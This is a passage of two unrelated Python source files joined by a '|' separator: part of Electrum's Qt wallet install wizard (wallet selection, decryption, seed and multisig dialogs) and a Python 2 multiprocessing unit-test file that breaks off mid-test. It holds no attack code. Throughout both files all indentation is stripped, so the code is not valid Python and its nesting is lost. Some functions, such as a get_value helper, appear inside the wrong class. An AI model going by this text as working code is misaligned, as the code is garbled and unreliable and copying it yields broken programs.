accept_signal = pyqtSignal()
def __init__(self, config: 'SimpleConfig', app: QApplication, plugins: 'Plugins'):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = WWLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(17 * char_width_in_lineedit())
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
vbox.addSpacing(50)
vbox_create_new = QVBoxLayout()
vbox_create_new.addWidget(QLabel(_('Alternatively') + ':'), alignment=Qt.AlignLeft)
button_create_new = QPushButton(_('Create New Wallet'))
button_create_new.setMinimumWidth(120)
vbox_create_new.addWidget(button_create_new, alignment=Qt.AlignLeft)
widget_create_new = QWidget()
widget_create_new.setLayout(vbox_create_new)
vbox_create_new.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(widget_create_new)
self.set_layout(vbox, title=_('Electrum wallet'))
temp_storage = None # type: Optional[WalletStorage]
wallet_folder = os.path.dirname(path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
# FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
nonlocal temp_storage
temp_storage = None
msg = None
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
temp_storage = wallet_from_memory.storage # type: Optional[WalletStorage]
else:
temp_storage = WalletStorage(path, manual_upgrades=True)
except (StorageReadWriteError, WalletFileException) as e:
msg = _('Cannot read file') + f'\n{repr(e)}'
except Exception as e:
self.logger.exception('')
msg = _('Cannot read file') + f'\n{repr(e)}'
self.next_button.setEnabled(temp_storage is not None)
user_needs_to_enter_password = False
if temp_storage:
if not temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
if msg is None:
msg = _('Cannot read file')
self.msg_label.setText(msg)
widget_create_new.setVisible(bool(temp_storage and temp_storage.file_exists()))
if user_needs_to_enter_password:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
button_create_new.clicked.connect(
partial(
self.name_e.setText,
get_new_wallet_name(wallet_folder)))
self.name_e.textChanged.connect(on_filename)
self.name_e.setText(os.path.basename(path))
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
assert temp_storage
if temp_storage.file_exists() and not temp_storage.is_encrypted():
break
if not temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if temp_storage.file_exists() and temp_storage.is_encrypted():
if temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
elif temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
if temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return temp_storage.path, (temp_storage if temp_storage.file_exists() else None)
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
test_multiprocessing.py
|
#!/usr/bin/env python
#
# Unit tests for the multiprocessing package
#
import unittest
import threading
import Queue
import time
import sys
import os
import gc
import signal
import array
import copy
import socket
import random
import logging
# Work around broken sem_open implementations
try:
import multiprocessing.synchronize
except ImportError, e:
from test.test_support import TestSkipped
raise TestSkipped(e)
import multiprocessing.dummy
import multiprocessing.connection
import multiprocessing.managers
import multiprocessing.heap
import multiprocessing.pool
import _multiprocessing
from multiprocessing import util
#
#
#
latin = str
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.WARNING
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
return
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertTrue(isinstance(authkey, bytes))
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def _test(self, q, *args, **kwds):
current = self.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if self.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEquals(p.authkey, current.authkey)
self.assertEquals(p.is_alive(), False)
self.assertEquals(p.daemon, True)
self.assertTrue(p not in self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEquals(p.exitcode, None)
self.assertEquals(p.is_alive(), True)
self.assertTrue(p in self.active_children())
self.assertEquals(q.get(), args[1:])
self.assertEquals(q.get(), kwargs)
self.assertEquals(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEquals(q.get(), current.authkey)
self.assertEquals(q.get(), p.pid)
p.join()
self.assertEquals(p.exitcode, 0)
self.assertEquals(p.is_alive(), False)
self.assertTrue(p not in self.active_children())
def _test_terminate(self):
time.sleep(1000)
def test_terminate(self):
if self.TYPE == 'threads':
return
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertTrue(p in self.active_children())
self.assertEqual(p.exitcode, None)
p.terminate()
join = TimingWrapper(p.join)
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertTrue(p not in self.active_children())
p.join()
# XXX sometimes get p.exitcode == 0 on Windows ...
#self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertTrue(p not in self.active_children())
p.start()
self.assertTrue(p in self.active_children())
p.join()
self.assertTrue(p not in self.active_children())
def _test_recursion(self, wconn, id):
from multiprocessing import forking
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = self.Process(
target=self._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
def _test_put(self, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(Queue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(Queue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
def _test_get(self, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(Queue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(Queue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(Queue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
def _test_fork(self, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(Queue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
return
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
def _test_task_done(self, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
if sys.version_info < (2, 5) and not hasattr(queue, 'task_done'):
return
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in xrange(4)]
for p in workers:
p.start()
for i in xrange(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
return
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
def f(self, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
